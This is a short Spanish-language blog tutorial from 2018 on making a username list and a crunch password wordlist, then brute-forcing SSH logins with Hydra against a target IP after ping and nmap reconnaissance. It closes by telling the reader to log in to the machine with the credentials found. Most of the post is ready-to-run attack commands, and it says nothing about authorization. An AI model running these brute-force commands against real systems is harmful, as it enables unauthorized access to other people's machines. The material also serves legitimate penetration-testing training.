miércoles, 1 de agosto de 2018

Como crear un diccionario de contraseñas


En este articulo voy a explicar como es el proceso para crear un diccionario de usuarios y un diccionario de contraseña que luego lo podrás utilizar para Hydra para realizar el acceso y la validación de usuario y contraseña ya creados 

En ese paso generamos el diccionario de usuarios
#nano user_list


admin

administrador
sudo
users
superusers


Nota: puedes ingresar otros usuarios basados en tu prueba estos son ejemplos



#cat user_list




Procedemos a utilizar la herramienta crunch para generar el diccionario de contraseñas



Para esto tenemos que instalar Crunch



#apt install crunch




Una vez instaldo Crunch realizamos el siguiente paso

#crunch 8 8 arondon12358 > /home/usuario/pass_list

Aquí estamos indicando crear un diccionario de contraseñas con una logitud minima de 8 caracteres, longitud máxima de 8 caracteres y basada en arondon12358



Para verficar el archivo creado realizamos el siguiente comando
#head pass_list
y
#tail pass_list



Una vez creado los diccionarios de usuarios y contraseñas se debe realizar la comprobación de conectividad y puertos abiertos de la maquina a la que se desea acceder realizando ping y un análisis con nmap

Una vez verificada la conectividad y los puertos, procedemos a realizar el ataque con Hydra, colocamos en el terminal lo siguiente

Comando para que indique las opciones y ejemplos de hydra
#hydra 

Con los parametros -L y -P utilizaremos los diccionarios creados en la primera parte del articulo
Con el parametro -s indicaremos el puerto (Puede ser opcional)
Con el parametro -f cerraremos la herramienta en el momento que encuentre un usuario y contraseña

#hydra ip-atacar ssh -s 22 -L user_list -P pass_list -f -vV 

Presionamos enter y esperamos que encuentre un usuario contraseña valido
Una vez finalizado arrojara que ha encontrado un usuario y password valido, el cual puedes usarlo con el comando ssh la misma ip que utilizamos con hydra y podras acceder al equipo 

No hay comentarios:

Publicar un comentario